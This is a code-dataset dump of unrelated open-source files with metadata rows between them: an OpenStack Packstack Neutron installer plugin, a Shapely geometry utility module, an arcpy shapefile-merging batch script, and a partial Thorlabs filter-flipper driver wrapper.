"USAGE" : "A comma separated list of IP addresses on which to install Neutron DHCP agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install Neutron DHCP agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_DHCP_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l2-plugin",
"USAGE" : "The name of the L2 plugin to be used with Neutron",
"PROMPT" : "Enter the name of the L2 plugin to be used with Neutron",
"OPTION_LIST" : ["linuxbridge", "openvswitch"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "openvswitch",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_L2_PLUGIN",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-metadata-hosts",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron metadata agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron metadata agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_METADATA_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-metadata-pw",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron metadata agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron metadata agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_METADATA_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
],
"NEUTRON_LB_PLUGIN" : [
{"CMD_OPTION" : "neutron-lb-tenant-network-type",
"USAGE" : "The type of network to allocate for tenant networks (eg. vlan, local, gre)",
"PROMPT" : "Enter the type of network to allocate for tenant networks",
"OPTION_LIST" : ["local", "vlan"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "local",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_LB_TENANT_NETWORK_TYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-lb-vlan-ranges",
"USAGE" : "A comma separated list of VLAN ranges for the Neutron linuxbridge plugin (eg. physnet1:1:4094,physnet2,physnet3:3000:3999)",
"PROMPT" : "Enter a comma separated list of VLAN ranges for the Neutron linuxbridge plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_LB_VLAN_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-lb-interface-mappings",
"USAGE" : "A comma separated list of interface mappings for the Neutron linuxbridge plugin (eg. physnet1:br-eth1,physnet2:br-eth2,physnet3:br-eth3)",
"PROMPT" : "Enter a comma separated list of interface mappings for the Neutron linuxbridge plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_LB_INTERFACE_MAPPINGS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"NEUTRON_OVS_PLUGIN" : [
{"CMD_OPTION" : "neutron-ovs-tenant-network-type",
"USAGE" : "Type of network to allocate for tenant networks (eg. vlan, local, gre)",
"PROMPT" : "Enter the type of network to allocate for tenant networks",
"OPTION_LIST" : ["local", "vlan", "gre"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "local",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-vlan-ranges",
"USAGE" : "A comma separated list of VLAN ranges for the Neutron openvswitch plugin (eg. physnet1:1:4094,physnet2,physnet3:3000:3999)",
"PROMPT" : "Enter a comma separated list of VLAN ranges for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_VLAN_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-bridge-mappings",
"USAGE" : "A comma separated list of bridge mappings for the Neutron openvswitch plugin (eg. physnet1:br-eth1,physnet2:br-eth2,physnet3:br-eth3)",
"PROMPT" : "Enter a comma separated list of bridge mappings for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-bridge-interfaces",
"USAGE" : "A comma separated list of colon-separated OVS bridge:interface pairs. The interface will be added to the associated bridge.",
"PROMPT" : "Enter a comma separated list of OVS bridge:interface pairs for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_BRIDGE_IFACES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"NEUTRON_OVS_PLUGIN_GRE" : [
{"CMD_OPTION" : "neutron-ovs-tunnel-ranges",
"USAGE" : "A comma separated list of tunnel ranges for the Neutron openvswitch plugin",
"PROMPT" : "Enter a comma separated list of tunnel ranges for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TUNNEL_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-tunnel-if",
"USAGE" : "Override the IP used for GRE tunnels on this hypervisor to the IP found on the specified interface (defaults to the HOST IP)",
"PROMPT" : "Enter interface with IP to override the default the GRE local_ip (defaults to HOST IP)",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TUNNEL_IF",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
}
def use_linuxbridge(config):
return config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge'
def use_openvswitch(config):
return config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch'
def use_openvswitch_gre(config):
return use_openvswitch(config) and \
config['CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE'] == 'gre'
conf_groups = [
{ "GROUP_NAME" : "NEUTRON",
"DESCRIPTION" : "Neutron config",
"PRE_CONDITION" : "CONFIG_NEUTRON_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_LB_PLUGIN",
"DESCRIPTION" : "Neutron LB plugin config",
"PRE_CONDITION" : use_linuxbridge,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_OVS_PLUGIN",
"DESCRIPTION" : "Neutron OVS plugin config",
"PRE_CONDITION" : use_openvswitch,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_OVS_PLUGIN_GRE",
"DESCRIPTION" : "Neutron OVS plugin config for GRE tunnels",
"PRE_CONDITION" : use_openvswitch_gre,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
]
for group in conf_groups:
paramList = conf_params[group["GROUP_NAME"]]
controller.addGroup(group, paramList)
def getInterfaceDriver():
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
return 'neutron.agent.linux.interface.OVSInterfaceDriver'
elif controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge':
return 'neutron.agent.linux.interface.BridgeInterfaceDriver'
def initSequences(controller):
if controller.CONF['CONFIG_NEUTRON_INSTALL'] != 'y':
return
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
controller.CONF['CONFIG_NEUTRON_L2_DBNAME'] = 'ovs_neutron'
controller.CONF['CONFIG_NEUTRON_CORE_PLUGIN'] = 'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
elif controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "linuxbridge":
controller.CONF['CONFIG_NEUTRON_L2_DBNAME'] = 'neutron_linux_bridge'
controller.CONF['CONFIG_NEUTRON_CORE_PLUGIN'] = 'neutron.plugins.linuxbridge.lb_neutron_plugin.LinuxBridgePluginV2'
global api_hosts, l3_hosts, dhcp_hosts, compute_hosts, meta_hosts, q_hosts
dirty = controller.CONF['CONFIG_NEUTRON_SERVER_HOST'].split(',')
api_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_L3_HOSTS'].split(',')
l3_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_DHCP_HOSTS'].split(',')
dhcp_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NEUTRON_METADATA_HOSTS'].split(',')
meta_hosts = set([i.strip() for i in dirty if i.strip()])
dirty = controller.CONF['CONFIG_NOVA_COMPUTE_HOSTS'].split(',')
compute_hosts = set([i.strip() for i in dirty if i.strip()])
q_hosts = api_hosts | l3_hosts | dhcp_hosts | compute_hosts | meta_hosts
neutron_steps = [
{'title': 'Adding Neutron API manifest entries', 'functions':[createManifest]},
{'title': 'Adding Neutron Keystone manifest entries', 'functions':[createKeystoneManifest]},
{'title': 'Adding Neutron L3 manifest entries', 'functions':[createL3Manifests]},
{'title': 'Adding Neutron L2 Agent manifest entries', 'functions':[createL2AgentManifests]},
{'title': 'Adding Neutron DHCP Agent manifest entries', 'functions':[createDHCPManifests]},
{'title': 'Adding Neutron Metadata Agent manifest entries', 'functions':[createMetadataManifests]},
]
controller.addSequence("Installing OpenStack Neutron", [], [], neutron_steps)
def createManifest(config):
global q_hosts
for host in q_hosts:
manifest_file = "%s_neutron.pp" % (host,)
manifest_data = getManifestTemplate("neutron.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
if host in api_hosts:
manifest_file = "%s_neutron.pp" % (host,)
manifest_data = getManifestTemplate("neutron_api.pp")
# Firewall Rules
config['FIREWALL_ALLOWED'] = ",".join(["'%s'" % i for i in q_hosts])
config['FIREWALL_SERVICE_NAME'] = "neutron"
config['FIREWALL_PORTS'] = "'9696'"
manifest_data += getManifestTemplate("firewall.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
# Set up any l2 plugin configs we need anywhere we install neutron
# XXX I am not completely sure about this, but it seems necessary
if controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch':
nettype = config.get("CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE", "local")
manifest_data = getManifestTemplate("neutron_ovs_plugin_%s.pp" % (nettype,))
appendManifestFile(manifest_file, manifest_data, 'neutron')
elif controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge':
manifest_data = getManifestTemplate("neutron_lb_plugin.pp")
appendManifestFile(manifest_file, manifest_data, 'neutron')
def createKeystoneManifest(config):
manifestfile = "%s_keystone.pp"%controller.CONF['CONFIG_KEYSTONE_HOST']
manifestdata = getManifestTemplate("keystone_neutron.pp")
appendManifestFile(manifestfile, manifestdata)
def createL3Manifests(config):
global l3_hosts
if controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE'] == 'provider':
controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE'] = ''
for host in l3_hosts:
controller.CONF['CONFIG_NEUTRON_L3_HOST'] = host
controller.CONF['CONFIG_NEUTRON_L3_INTERFACE_DRIVER'] = getInterfaceDriver()
manifestdata = getManifestTemplate("neutron_l3.pp")
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + '\n')
if controller.CONF['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch' and controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE']:
controller.CONF['CONFIG_NEUTRON_OVS_BRIDGE'] = controller.CONF['CONFIG_NEUTRON_L3_EXT_BRIDGE']
manifestdata = getManifestTemplate('neutron_ovs_bridge.pp')
appendManifestFile(manifestfile, manifestdata + '\n')
def createDHCPManifests(config):
global dhcp_hosts
for host in dhcp_hosts:
controller.CONF["CONFIG_NEUTRON_DHCP_HOST"] = host
controller.CONF['CONFIG_NEUTRON_DHCP_INTERFACE_DRIVER'] = getInterfaceDriver()
manifestdata = getManifestTemplate("neutron_dhcp.pp")
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + "\n")
def get_values(val):
return [x.strip() for x in val.split(',')] if val else []
def createL2AgentManifests(config):
global api_hosts, compute_hosts, dhcp_host, l3_hosts
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch":
host_var = 'CONFIG_NEUTRON_OVS_HOST'
template_name = "neutron_ovs_agent_%s.pp" % (
config.get('CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE', 'local'),
)
bm_arr = get_values(controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS"])
iface_arr = get_values(controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_IFACES"])
# The CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS parameter contains a
# comma-separated list of bridge mappings. Since the puppet module
# expects this parameter to be an array, this parameter must be properly
# formatted by packstack, then consumed by the puppet module.
# For example, the input string 'A, B, C' should formatted as '['A','B','C']'.
controller.CONF["CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS"] = str(bm_arr)
elif controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "linuxbridge":
host_var = 'CONFIG_NEUTRON_LB_HOST'
template_name = 'neutron_lb_agent.pp'
else:
raise KeyError("Unknown layer2 agent")
# Install l2 agents on every compute host in addition to any hosts listed
# specifically for the l2 agent
for host in api_hosts | compute_hosts | dhcp_hosts | l3_hosts:
controller.CONF[host_var] = host
manifestfile = "%s_neutron.pp" % (host,)
manifestdata = getManifestTemplate(template_name)
appendManifestFile(manifestfile, manifestdata + "\n")
if controller.CONF["CONFIG_NEUTRON_L2_PLUGIN"] == "openvswitch" and \
controller.CONF['CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE'] == 'vlan':
for if_map in iface_arr:
controller.CONF['CONFIG_NEUTRON_OVS_BRIDGE'], controller.CONF['CONFIG_NEUTRON_OVS_IFACE'] = if_map.split(':')
manifestdata = getManifestTemplate("neutron_ovs_port.pp")
appendManifestFile(manifestfile, manifestdata + "\n")
# Additional configurations required for compute hosts
if host in compute_hosts:
manifestdata = getManifestTemplate('neutron_bridge_module.pp')
appendManifestFile(manifestfile, manifestdata + '\n')
def createMetadataManifests(config):
global meta_hosts
for host in meta_hosts:
controller.CONF['CONFIG_NEUTRON_METADATA_HOST'] = host
manifestdata = getManifestTemplate('neutron_metadata.pp')
manifestfile = "%s_neutron.pp" % (host,)
appendManifestFile(manifestfile, manifestdata + "\n")
| apache-2.0 | 2,895,030,083,126,288,400 | 50.338428 | 172 | 0.55952 | false |
jaantollander/CrowdDynamics | crowddynamics/core/geometry.py | 1 | 4119 | """Functions for manipulating Shapely geometry objects
References:
- http://toblerity.org/shapely/manual.html
"""
from collections import Iterable
from functools import reduce
from itertools import chain
from typing import Callable
import numpy as np
import shapely.geometry as geometry
import skimage.draw
from shapely import speedups
from shapely.geometry import Polygon, LineString, Point
from shapely.geometry.base import BaseGeometry, BaseMultipartGeometry
from crowddynamics.core.structures import obstacle_type_linear
if speedups.available:
speedups.enable()
class GeomTypes(object):
POINT = 0.0
LINESTRING = 1.0
POLYGON_HOLE = 2.0
POLYGON_SHELL = 3.0
def _geom_to_array(geom: BaseGeometry):
if isinstance(geom, geometry.Point):
yield np.array([(np.nan, GeomTypes.POINT)])
yield np.asarray(geom.coords)
elif isinstance(geom, geometry.LineString):
yield np.array([(np.nan, GeomTypes.LINESTRING)])
yield np.asarray(geom.coords)
elif isinstance(geom, geometry.Polygon):
for interior in geom.interiors:
yield np.array([(np.nan, GeomTypes.POLYGON_HOLE)])
yield np.asarray(interior)
yield np.array([(np.nan, GeomTypes.POLYGON_SHELL)])
yield np.asarray(geom.exterior)
elif isinstance(geom, BaseMultipartGeometry):
return chain.from_iterable(map(geom_to_array, geom))
else:
raise TypeError
def geom_to_array(geom: BaseGeometry):
"""Breaking geometry object into continuous array where objects are
separated by array of elements (np.nan, FLAG)
Args:
geom:
Returns:
"""
return np.concatenate(list(_geom_to_array(geom)))
def geom_to_linesegment(geom: BaseGeometry):
"""Converts shapes to point pairs.
>>> ls = LineString([(1, 2), (3, 4)])
>>> list(geom_to_linesegment(ls))
[((1.0, 2.0), (3.0, 4.0))]
>>> poly = Polygon([(5, 6), (7, 8), (9, 10)])
>>> list(geom_to_linesegment(poly))
[((5.0, 6.0), (7.0, 8.0)),
((7.0, 8.0), (9.0, 10.0)),
((9.0, 10.0), (5.0, 6.0))]
>>> list(geom_to_linesegment(ls | poly))
[((1.0, 2.0), (3.0, 4.0)),
((5.0, 6.0), (7.0, 8.0)),
((7.0, 8.0), (9.0, 10.0)),
((9.0, 10.0), (5.0, 6.0))]
Args:
geom (BaseGeometry): BaseGeometry type.
Returns:
Iterable[LineSegment]: Iterable of linesegments
"""
if isinstance(geom, Point):
return iter(())
elif isinstance(geom, LineString):
return zip(geom.coords[:-1], geom.coords[1:])
elif isinstance(geom, Polygon):
return zip(geom.exterior.coords[:-1], geom.exterior.coords[1:])
elif isinstance(geom, BaseMultipartGeometry):
return chain.from_iterable(map(geom_to_linesegment, geom))
else:
raise TypeError('Argument is not subclass of {}'.format(BaseGeometry))
def geom_to_linear_obstacles(geom):
"""Converts shape(s) to array of linear obstacles."""
segments = [] if geom is None else list(geom_to_linesegment(geom))
return np.array(segments, dtype=obstacle_type_linear)
def draw_geom(geom: BaseGeometry,
grid,
indicer: Callable,
value):
"""Draw geom to grid"""
if isinstance(geom, Point):
pass
elif isinstance(geom, LineString):
for line in geom_to_linesegment(geom):
r0, c0, r1, c1 = indicer(line).flatten()
x, y = skimage.draw.line(r0, c0, r1, c1)
grid[y, x] = value
elif isinstance(geom, Polygon):
i = indicer(geom.exterior)
x, y = skimage.draw.polygon(i[:, 0], i[:, 1])
grid[y, x] = value
x, y = skimage.draw.polygon_perimeter(i[:, 0], i[:, 1])
grid[y, x] = value
for j in map(indicer, geom.interiors):
x, y = skimage.draw.polygon(j[:, 0], j[:, 1])
grid[y, x] = 0
elif isinstance(geom, BaseMultipartGeometry):
for geo in geom:
draw_geom(geo, grid, indicer, value)
else:
raise TypeError
def union(*geoms):
"""Union of geometries"""
return reduce(lambda x, y: x | y, geoms)
| gpl-3.0 | 8,994,286,143,035,750,000 | 29.511111 | 78 | 0.61714 | false |
Riverscapes/pyBRAT | SupportingTools/BatchScripts/01_BatchInputPrep/07_MergePerennialCanals_Batch.py | 1 | 2133 | #----------------------------------------------------------------------------
# Name: Merge Perennial & Canals (Batch)
#
# Purpose: Merges perennial network and canals/ditches shapefile
#
# Date: March 2019
# Author: Maggie Hallerud
#----------------------------------------------------------------------------
# user defined paths
# pf_path - project folder path for batch processing
pf_path = r'C:\Users\ETAL\Desktop\GYE_BRAT\wrk_Data'
# import required modules
import arcpy
import os
arcpy.CheckOutExtension('Spatial')
def main():
# set up arcpy environment
arcpy.env.workspace = 'in_memory'
arcpy.env.overwriteOutput = True
os.chdir(pf_path)
# list all folders in parent folder - note this is not recursive
dir_list = filter(lambda x: os.path.isdir(x), os.listdir('.'))
# remove folders in the list that start with '00_' since these aren't the HUC8 watersheds
for dir in dir_list[:]:
if dir.startswith('00_'):
dir_list.remove(dir)
# merges perennial and canals/ditches shapefiles and save as 'NHD_24k_Perennial_CanalsDitches.shp'
for dir in dir_list:
# specifying input perennial and canal shapefiles and output shapefile name
perennial_shp = os.path.join(pf_path, dir, 'NHD/NHD_24k_Perennial.shp')
canal_shp = os.path.join(pf_path, dir, 'NHD/NHDCanalsDitches.shp')
out_shp = os.path.join(pf_path, dir, 'NHD/NHD_24k_Perennial_CanalsDitches.shp')
# if canals exist then merge with perennial, otherwise just copy perennial
if os.path.exists(perennial_shp):
print "Merging perennial and canal shapefiles for " + dir
try:
if os.path.exists(canal_shp):
arcpy.Merge_management([perennial_shp, canal_shp], out_shp)
else:
arcpy.CopyFeatures_management(perennial_shp, out_shp)
# catch errors and move to the next huc8 folder
except Exception as err:
print "Error with " + dir + ". Exception thrown was: "
print err
if __name__ == "__main__":
main()
| gpl-3.0 | -4,074,758,029,799,556,000 | 34.55 | 102 | 0.593999 | false |
MSLNZ/msl-equipment | msl/equipment/resources/thorlabs/kinesis/filter_flipper.py | 1 | 16157 | """
This module provides all the functionality required to control a
Filter Flipper (MFF101, MFF102).
"""
from ctypes import byref, c_int64
from msl.equipment.resources import register
from msl.equipment.resources.utils import WORD, DWORD
from msl.equipment.resources.thorlabs.kinesis.motion_control import MotionControl
from msl.equipment.resources.thorlabs.kinesis.api_functions import FilterFlipper_FCNS
from msl.equipment.resources.thorlabs.kinesis.structs import FF_IOSettings
from msl.equipment.resources.thorlabs.kinesis.enums import FF_IOModes, FF_SignalModes
@register(manufacturer=r'Thorlabs', model=r'MFF10[1|2]')
class FilterFlipper(MotionControl):
MIN_TRANSIT_TIME = 300
MAX_TRANSIT_TIME = 2800
MIN_PULSE_WIDTH = 10
MAX_PULSE_WIDTH = 200
def __init__(self, record):
"""A wrapper around ``Thorlabs.MotionControl.FilterFlipper.dll``.
The :attr:`~msl.equipment.record_types.ConnectionRecord.properties`
for a FilterFlipper connection supports the following key-value pairs in the
:ref:`connections-database`::
'device_name': str, the device name found in ThorlabsDefaultSettings.xml [default: None]
Do not instantiate this class directly. Use the :meth:`~.EquipmentRecord.connect`
method to connect to the equipment.
Parameters
----------
record : :class:`~msl.equipment.record_types.EquipmentRecord`
A record from an :ref:`equipment-database`.
"""
name = record.connection.properties.get('device_name')
if name is None:
record.connection.properties['device_name'] = 'MFF Filter Flipper'
super(FilterFlipper, self).__init__(record, FilterFlipper_FCNS)
def open(self):
"""Open the device for communication.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_Open(self._serial)
def close(self):
"""Disconnect and close the device."""
self.sdk.FF_Close(self._serial)
def check_connection(self):
"""Check connection.
Returns
-------
:class:`bool`
Whether the USB is listed by the FTDI controller.
"""
return self.sdk.FF_CheckConnection(self._serial)
def identify(self):
"""Sends a command to the device to make it identify itself."""
self.sdk.FF_Identify(self._serial)
def get_hardware_info(self):
"""Gets the hardware information from the device.
Returns
-------
:class:`.structs.TLI_HardwareInformation`
The hardware information.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
return self._get_hardware_info(self.sdk.FF_GetHardwareInfo)
def get_firmware_version(self):
"""Gets version number of the device firmware.
Returns
-------
:class:`str`
The firmware version.
"""
return self.to_version(self.sdk.FF_GetFirmwareVersion(self._serial))
def get_software_version(self):
"""Gets version number of the device software.
Returns
-------
:class:`str`
The device software version.
"""
return self.to_version(self.sdk.FF_GetSoftwareVersion(self._serial))
def load_settings(self):
"""Update device with stored settings.
The settings are read from ``ThorlabsDefaultSettings.xml``, which
gets created when the Kinesis software is installed.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_LoadSettings(self._serial)
def load_named_settings(self, settings_name):
"""Update device with named settings.
Parameters
----------
settings_name : :class:`str`
The name of the device to load the settings for. Examples for the value
of `setting_name` can be found in `ThorlabsDefaultSettings.xml``, which
gets created when the Kinesis software is installed.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_LoadNamedSettings(self._serial, settings_name.encode())
def persist_settings(self):
"""Persist the devices current settings.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_PersistSettings(self._serial)
def get_number_positions(self):
"""Get number of positions available from the device.
Returns
-------
:class:`int`
The number of positions.
"""
return self.sdk.FF_GetNumberPositions(self._serial)
def home(self):
"""Home the device.
Homing the device will set the device to a known state and determine
the home position.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_Home(self._serial)
def move_to_position(self, position):
"""Move the device to the specified position (index).
Parameters
----------
position : :class:`int`
The required position. Must be 1 or 2.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_MoveToPosition(self._serial, position)
def get_position(self):
"""Get the current position.
Returns
-------
:class:`int`
The position, 1 or 2 (can be 0 during a move).
"""
return self.sdk.FF_GetPosition(self._serial)
def get_io_settings(self):
"""Gets the I/O settings from filter flipper.
Returns
-------
:class:`~.structs.FF_IOSettings`
The Filter Flipper I/O settings.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
settings = FF_IOSettings()
self.sdk.FF_GetIOSettings(self._serial, byref(settings))
return settings
def request_io_settings(self):
"""Requests the I/O settings from the filter flipper.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
self.sdk.FF_RequestIOSettings(self._serial)
def set_io_settings(self, transit_time=500,
oper1=FF_IOModes.FF_ToggleOnPositiveEdge, sig1=FF_SignalModes.FF_InputButton, pw1=200,
oper2=FF_IOModes.FF_ToggleOnPositiveEdge, sig2=FF_SignalModes.FF_OutputLevel, pw2=200):
"""
Sets the settings on filter flipper.
Parameters
----------
transit_time : :class:`int`, optional
Time taken to get from one position to other in milliseconds.
oper1 : :class:`~.enums.FF_IOModes`, optional
I/O 1 Operating Mode.
sig1 : :class:`~.enums.FF_SignalModes`, optional
I/O 1 Signal Mode.
pw1 : :class:`int`, optional
Digital I/O 1 pulse width in milliseconds.
oper2 : :class:`~.enums.FF_IOModes`, optional
I/O 2 Operating Mode.
sig2 : :class:`~.enums.FF_SignalModes`, optional
I/O 2 Signal Mode.
pw2 : :class:`int`, optional
Digital I/O 2 pulse width in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
if transit_time > self.MAX_TRANSIT_TIME or transit_time < self.MIN_TRANSIT_TIME:
msg = 'Invalid transit time value of {} ms; {} <= transit_time <= {}'.format(
transit_time, self.MIN_TRANSIT_TIME, self.MAX_TRANSIT_TIME)
self.raise_exception(msg)
if pw1 > self.MAX_PULSE_WIDTH or pw1 < self.MIN_PULSE_WIDTH:
msg = 'Invalid digital I/O 1 pulse width of {} ms; {} <= pw <= {}'.format(
pw1, self.MIN_PULSE_WIDTH, self.MAX_PULSE_WIDTH)
self.raise_exception(msg)
if pw2 > self.MAX_PULSE_WIDTH or pw2 < self.MIN_PULSE_WIDTH:
msg = 'Invalid digital I/O 2 pulse width of {} ms; {} <= pw <= {}'.format(
pw2, self.MIN_PULSE_WIDTH, self.MAX_PULSE_WIDTH)
self.raise_exception(msg)
settings = FF_IOSettings()
settings.transitTime = int(transit_time)
settings.digIO1OperMode = self.convert_to_enum(oper1, FF_IOModes, prefix='FF_')
settings.digIO1SignalMode = self.convert_to_enum(sig1, FF_SignalModes, prefix='FF_')
settings.digIO1PulseWidth = int(pw1)
settings.digIO2OperMode = self.convert_to_enum(oper2, FF_IOModes, prefix='FF_')
settings.digIO2SignalMode = self.convert_to_enum(sig2, FF_SignalModes, prefix='FF_')
settings.digIO2PulseWidth = int(pw2)
self.sdk.FF_SetIOSettings(self._serial, byref(settings))
def get_transit_time(self):
"""Gets the transit time.
Returns
-------
:class:`int`
The transit time in milliseconds.
"""
return self.sdk.FF_GetTransitTime(self._serial)
def set_transit_time(self, transit_time):
"""Sets the transit time.
Parameters
----------
transit_time : :class:`int`
The transit time in milliseconds.
Raises
------
~msl.equipment.exceptions.ThorlabsError
If not successful.
"""
if transit_time > self.MAX_TRANSIT_TIME or transit_time < self.MIN_TRANSIT_TIME:
msg = 'Invalid transit time value of {} ms; {} <= transit_time <= {}'.format(
transit_time, self.MIN_TRANSIT_TIME, self.MAX_TRANSIT_TIME)
self.raise_exception(msg)
self.sdk.FF_SetTransitTime(self._serial, int(transit_time))
def request_status(self):
"""Request status bits.
This needs to be called to get the device to send it's current status.
